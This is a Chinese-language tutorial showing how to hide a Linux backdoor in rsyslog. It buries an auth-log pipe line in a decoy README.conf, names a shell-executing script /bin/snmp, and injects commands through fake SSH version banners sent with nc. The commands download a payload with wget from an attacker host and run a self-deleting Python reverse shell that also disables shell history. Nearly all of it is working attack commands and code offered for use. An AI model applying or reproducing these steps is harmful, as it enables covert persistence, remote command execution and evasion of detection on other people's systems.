0×01. 关于Rsyslog

ryslog 是一个快速处理收集系统日志的程序,提供了高性能、安全功能和模块化设计。rsyslog 是syslog 的升级版,它将多种来源输入输出转换结果到目的地,据官网介绍,现在可以处理100万条信息。

特性:

1.多线程

2.支持加密协议:ssl,tls,relp

3.mysql、oracle、postgreSQL

4.等等..

一般主流的Linux发行版本中都会自带Rsyslog服务,本文则利用这个常见的日志服务隐藏系统后门

0×02. 实例演示利用Rsyslog 隐藏系统后门

试验环境

10.1.100.1       远程服务器,提供反弹py脚本下载 (windows7)

10.1.100.2       控制端   (centos)

10.1.100.3       被控端    (kali)

一、被控端配置

1. 给rsylog添加后门配置文件

在被控端 上执行以下命令(假设你已经获取victim的 root权限)

man -a rsyslogd syslog | sed 's/^/#&/g' | sed '187 aauth.* ^/bin/snmp #' > /etc/rsyslog.d/README.conf 

这串命令的意思试讲 关于rsyslogd syslog的所有man 帮助信息导入到/etc/rsyslog.d 目录下的README.conf文件中,且在README.conf 文件的188行写入

auth.* ^/bin/snmp # 

命令中之所以写成aauth, 是因为a是sed的中的关键字,被自动过滤掉,所以要多写一个

命令执行完之后的,结果如下:

Readme.png

我们知道 Rsyslog 服务会将/etc/resyslog.d 目录下的*.conf 文件都认为是配置文件, 这里将名字定为 README.conf 也是增强迷惑性(当然你也可以找到rsyslog的配置文件,然后修改这个配置文件)

我们来看配置文件中唯一一行没有被注释掉的代码

auth.* ^/bin/snmp # 

之所以将其放在188行,因为一般人看到这么多注释行,不会继续往下翻, 将配置行 放在这里不容易被发现

其中auth 表示的是PAM认证产生的日志

auth.* ^/bin/snmp #  的意思是将 PAM 产生的所有日志都发往/bin/snmp 程序

这里的/bin/snmp 就是我们留下的后门,snmp也是为了增强迷惑性而命名的

2.  编写后门代码

后门是一个很简单,设置可以说是简陋的sh脚本, 代码如下:


#!/bin/sh

sh -c "$1"

$1 表示传给脚本的第1个参数内容

-c 表示将 $1的字符串内容当做sh命令执行

别忘了给后门增加可执行权限

chmod 755 /bin/snmp 

3. 重启rsyslog 服务

systemctl restart rsyslog 

至此 被控端配置完毕

二、控制端配置

一般的系统都会开放SSH 服务,而且ssh 是基于PAM认证的,所以ssh认证登录中产生的日志都会发往 /bin/snmp

1. 在控制端执行监听,等待shell反弹

31337.png

2. 在控制端执行如下命令,下载反弹py脚本,并保存在被控端的/tmp/x.py:

echo "';wget http://10.1.100.1/x.py -O /tmp/x.py;'"|nc 10.1.100.3 22

我们知道ssh 协议在通信的时候首先需要交换ssh版本信息,已确定是否可以通信

所以这里 ‘;wget http://10.1.100.1/x.py -O /tmp/x.py;’ 相当于向victim (10.1.100.3) 宣告自己的ssh版本(显然这里是伪造的,但这不重要),这个版本宣告信息会被rsyslog捕获,并将其传至/bin/snmp, /bin/snmp 会将;wgethttp://10.1.100.1/x.py -O /tmp/x.py;视为入参, 然后执行脚本

也即:

sh -C ";wget http://10.1.100.1/x.py -O /tmp/x.py;" 

不知道你注意到没,这里在wget 的命令前后加上;目的是为了防止ssh通信中其他日志信息干扰wget 命令执行

x.py 代码如下:

    import os
    import pty
    import socket
    
    lhost = "10.1.100.2" # XXX: CHANGEME     lport = 31337 # XXX: CHANGEME     
    def main():         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((lhost, lport))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        os.putenv("HISTFILE",'/dev/null')
        pty.spawn("/bin/bash")
        os.remove('/tmp/x.py')    # 退出后销毁自身         s.close()
        
    if __name__ == "__main__":
        main() 

命令执行结果:

xiazai.png

被控端查看,下载成功

OK.png

4. 执行x.py, 反弹shell

控制端执行:

echo "';python /tmp/x.py;'"|nc 10.1.100.3 22

控制端查看,获取shell

getshell.png

*本文原创作者:fnpimr43017